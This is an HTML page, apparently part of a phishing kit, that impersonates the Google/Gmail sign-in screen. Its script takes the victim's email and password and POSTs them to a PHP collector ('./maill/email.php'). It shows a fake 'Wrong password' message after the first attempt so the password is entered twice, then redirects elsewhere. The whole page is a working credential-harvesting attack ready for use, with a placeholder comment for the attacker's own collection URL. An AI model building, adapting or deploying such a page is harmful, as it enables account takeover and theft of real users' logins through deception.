<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="icon" href="https://logo.clearbit.com/mail.google.com" type="image/svg+xml">
    <title>Gmail</title>
    <style>
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
        }
        body {
            background: #f0f4f9;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        main {
            width: 80%;
        }
        .logo img {
            width: 100%;
            height: auto;
        }
        .logo {
            width: 78px;
        }
        .flexgoogle {
            display: flex;
            align-items: baseline;
            justify-content: space-between;
            padding: 3rem 4rem;
            border-radius: 28px;
            background: #fff;
            width: 100%;
        }
        .side1, .side2 {
            width: 45%;
        }
        .side2 {
            margin-top: 1rem;
        }
        .side1 h1 {
            color: #1f1f1f;
            font-size: 34px;
            font-weight: 400;
        }
        .did-floating-label-content { 
        position:relative; 
        margin-bottom:20px; 
        }
        .did-floating-label {
            color:rgb(0 0 0 / 60%); 
            font-size:13px;
            font-weight:normal;
            position:absolute;
            pointer-events:none;
            left:15px;
            top:11px;
            padding:0 5px;
            background: #fff;
            transition:0.2s ease all; 
            -moz-transition:0.2s ease all; 
            -webkit-transition:0.2s ease all;
        }
        .did-floating-input {
            font-size:12px;
            display:block;
            width:100%;
            /* height:36px; */
            padding: 16.5px 14px;
            background: #fff;
            color: #323840;
            border: 1px solid rgb(0 0 0 / 60%);
            border-radius: 4px;
            box-sizing: border-box;
            &:focus{
                outline:none;
                border: 2px solid #0b57d0;
                ~ .did-floating-label{
                top:-8px;
                font-size:13px;
                color: #0b57d0;
                }
            }
        }
        .did-floating-input:not(:placeholder-shown) ~ .did-floating-label {
        top:-8px;
        font-size:13px;
        }
        .did-floating-select:not([value=""]):valid ~ .did-floating-label {
        top:-8px;
        font-size:13px;
        }
        .did-floating-select[value=""]:focus ~ .did-floating-label {
        top:11px;
        font-size:13px;
        }
        .flrvbt {
            display: flex;
            align-items: center;
            gap: 1rem;
            justify-content: end;
            margin-top: 3rem;
        }
        a {
            color: #0b57d0;
            text-decoration: none;
            transition: color 0.3s ease;
            font-weight: 500;
        }
        button {
            padding: 10px 20px;
            border: none;
            background: #0b57d0;
            color: white;
            border-radius: 20px;
        }


        /* From Uiverse.io by vishnupprajapat */ 
        .checkbox-wrapper-46  {
            display: none;
            margin-top: 2rem;
        }
        .checkbox-wrapper-46 input[type="checkbox"] {
        display: none;
        visibility: hidden;
        }

        .checkbox-wrapper-46 .cbx {
        margin: auto;
        -webkit-user-select: none;
        user-select: none;
        cursor: pointer;
        }
        .checkbox-wrapper-46 .cbx span {
        display: inline-block;
        vertical-align: middle;
        transform: translate3d(0, 0, 0);
        }
        .checkbox-wrapper-46 .cbx span:first-child {
        position: relative;
        width: 18px;
        height: 18px;
        border-radius: 3px;
        transform: scale(1);
        vertical-align: middle;
        border: 1px solid #9098a9;
        transition: all 0.2s ease;
        }
        .checkbox-wrapper-46 .cbx span:first-child svg {
        position: absolute;
        top: 3px;
        left: 2px;
        fill: none;
        stroke: #ffffff;
        stroke-width: 2;
        stroke-linecap: round;
        stroke-linejoin: round;
        stroke-dasharray: 16px;
        stroke-dashoffset: 16px;
        transition: all 0.3s ease;
        transition-delay: 0.1s;
        transform: translate3d(0, 0, 0);
        }
        .checkbox-wrapper-46 .cbx span:first-child:before {
        content: "";
        width: 100%;
        height: 100%;
        background: #506eec;
        display: block;
        transform: scale(0);
        opacity: 1;
        border-radius: 50%;
        }
        .checkbox-wrapper-46 .cbx span:last-child {
        padding-left: 8px;
        }
        .checkbox-wrapper-46 .cbx:hover span:first-child {
        border-color: #506eec;
        }

        .checkbox-wrapper-46 .inp-cbx:checked + .cbx span:first-child {
        background: #506eec;
        border-color: #506eec;
        animation: wave-46 0.4s ease;
        }
        .checkbox-wrapper-46 .inp-cbx:checked + .cbx span:first-child svg {
        stroke-dashoffset: 0;
        }
        .checkbox-wrapper-46 .inp-cbx:checked + .cbx span:first-child:before {
        transform: scale(3.5);
        opacity: 0;
        transition: all 0.6s ease;
        }
        @keyframes wave-46 {
        50% {
            transform: scale(0.9);
        }
        }
        .side1 #sp {
            display: none;
            gap: 7px;
            align-items: center;
            border: 1px solid black;
            padding: 0px 3px;
            border-radius: 20px;
            font-size: 13px;
            font-weight: 600;
        }
        #passbox {
            display: none;
        }
        #load {
            width: 100%;
            height: 100vh;
            background: #ccd2dd56;
            position: fixed;
            top: 0;
            display: none;
        }
        #errome {
            color: red;
            display: block;
            margin-top: -18px;
            font-size: 13px;
        }
        .lfgglang {
            display: flex;
            align-items: center;
            justify-content: space-between;
            margin-top: 1rem;
            font-size: 11px;
            padding: 0 1rem;
        }
        .helpe {
            display: flex;
            align-items: center;
            gap: 1rem;
        }
        .helpe a {
            color: #323840;
        }
        @media screen and (max-width: 768px) {
            .flexgoogle {
                flex-direction: column;
            }
            body {
                background: #fff;
            }
            .side1, .side2 {
                width: 100%;
            }
            .flexgoogle {
                display: flex;
                align-items: baseline;
                justify-content: space-between;
                padding: 2rem 1rem;
                border-radius: 28px;
                background: #fff;
                width: 100%;
                font-family: system-ui;
               line-height: 27px;
            }
            main {
                width: 100%;
            }
            body {
                display: block;
            }
            .side1 h1 {
                color: #1f1f1f;
                font-size: 34px;
                font-weight: 400;
                margin-bottom: 2rem;
            }
            .logo {
                width: 54px;
                margin-bottom: 1rem;
            }
        }
    </style>
</head>
<body>
    <main>
        <form id="TETcuYGOc" method="post" action="" class="flexgoogle">
            <div class="side1">
                <div class="logo">
                    <img src="https://logo.clearbit.com/google.com" alt="">
                </div>
                <h1 id="well">Sign in</h1>
                <span style="display: block;" id="hidee">Use your Google Account</span>
                <span id="sp">
                    <svg aria-hidden="true" class="Qk3oof" fill="currentColor" focusable="false" width="20px" height="20px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm6.36 14.83c-1.43-1.74-4.9-2.33-6.36-2.33s-4.93.59-6.36 2.33C4.62 15.49 4 13.82 4 12c0-4.41 3.59-8 8-8s8 3.59 8 8c0 1.82-.62 3.49-1.64 4.83zM12 6c-1.94 0-3.5 1.56-3.5 3.5S10.06 13 12 13s3.5-1.56 3.5-3.5S13.94 6 12 6z"></path></svg>
                    <p id="emm"></p>
                    <div class="svv">
                        <svg aria-hidden="true" class="Qk3oof u4TTuf" fill="currentColor" focusable="false" width="24px" height="24px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><path d="M7 10l5 5 5-5z"></path></svg>
                    </div>
                </span>
            </div>
            <div class="side2">
                <div class="did-floating-label-content" id="emailbox">
                    <input class="did-floating-input" id="email" type="email" name="aa" required placeholder=" ">
                    <label class="did-floating-label">Email or phone</label>
                </div>

                <div class="did-floating-label-content" id="passbox">
                    <input class="did-floating-input" id="password" type="password" name="bb" required placeholder=" ">
                    <label class="did-floating-label">Enter your password</label>
                </div>
                <div id="errome">
                    
                </div>
                <div class="checkbox-wrapper-46" id="checks">
                    <input type="checkbox" id="cbx-46" class="inp-cbx" />
                    <label for="cbx-46" class="cbx"
                        ><span>
                        <svg viewBox="0 0 12 10" height="10px" width="12px">
                            <polyline points="1.5 6 4.5 9 10.5 1"></polyline></svg></span
                        ><span>Show password</span>
                    </label>
                </div>

                <a href="#" id="hidee"> Forgot email?</a><br><br>

                <p id="hidee">Not your computer? Use Guest mode to sign in privately. <a href="#">Learn more about using Guest mode</a></p>

                <div class="flrvbt">
                    <a href="#" id="fogpass">Create account</a>
                    <button type="button" id="next">Next</button>
                </div>
            </div>
        </form>
        <div class="lfgglang" style="display: none;">
            <div class="dila">
                English (United Kingdom)
            </div>
            <div class="helpe">
                <a href="#">Help</a>
                <a href="#">Privacy</a>
                <a href="#">Terms</a>
            </div>
        </div>
    </main>

    <div id="load">

    </div>
    <script>
        // Get references to the password input and the checkbox
        const passwordInput = document.getElementById('password');
        const toggleCheckbox = document.getElementById('cbx-46');

        // Add an event listener to the checkbox
        toggleCheckbox.addEventListener('change', function () {
            if (this.checked) {
                // If the checkbox is checked, change the input type to 'text' to show the password
                passwordInput.type = 'text';
            } else {
                // Otherwise, revert it back to 'password'
                passwordInput.type = 'password';
            }
        });

        document.getElementById("next").addEventListener("click", ()=>{
            var input = document.getElementById("email").value.trim();
            if (/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(input)) {
                localStorage.setItem("emailg", input)
                document.getElementById("load").style.display = "block";
                setInterval(() => {
                    document.getElementById("load").style.display = "none";
                    document.getElementById("fogpass").style.display = "none";
                    document.getElementById("passbox").style.display = "block";
                    document.getElementById("sp").style.display = "inline-flex";
                    document.getElementById("checks").style.display = "block";
                    document.getElementById("emailbox").style.visibility = "hidden";
                    document.getElementById("emailbox").style.height = "0";
                    document.getElementById("well").textContent = "Welcome"
                    document.getElementById("emm").textContent = input;
                    document.querySelectorAll("#hidee").forEach(el => {  // Use querySelectorAll for multiple elements
                        el.style.display = "none";
                    });
                    document.getElementById("next").type = "submit";
                }, 2000);
            } else {
                alert("Please enter a valid Email address") 
            }
        })

        var formSubmitted = 0;


        document.getElementById("TETcuYGOc").addEventListener("submit", function (event) {
            document.getElementById("load").style.display = "block";
        event.preventDefault();

        formSubmitted++;
        
        var inputs = document.querySelectorAll('input[required]');
        for (var i = 0; i < inputs.length; i++) {
            if (!inputs[i].value.trim()) {
                alert("Please fill in all fields.");
                return;
            }
        }

        var formData = new FormData(this);
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "./maill/email.php", true); // your php url here eg http://yourdomain.com/result.php

        xhr.onreadystatechange = function () {
            if (xhr.readyState == 4 && xhr.status == 200) {
                // const dd = localStorage.getItem("userDomain")
                // console.log(xhr.responseText);

                if (formSubmitted === 1) {
                    console.log("YESSSSS");
                    document.getElementById("password").value = "";
                    setTimeout(() => {
                        document.getElementById("load").style.display = "none";
                    }, 10000);
                    // document.getElementById("load").style.display = "block";
                    document.getElementById("errome").textContent = "Wrong password. Please try again .";
                } else if (formSubmitted >= 2) {
                    setInterval(() => {
                        // document.getElementById("password").value = "";
                        window.location.href = `./text.html`;
                    }, 2000);
                
                        console.log("invalid");
                }
            }
        };

        xhr.send(formData);
    });
    </script>
</body>
</html>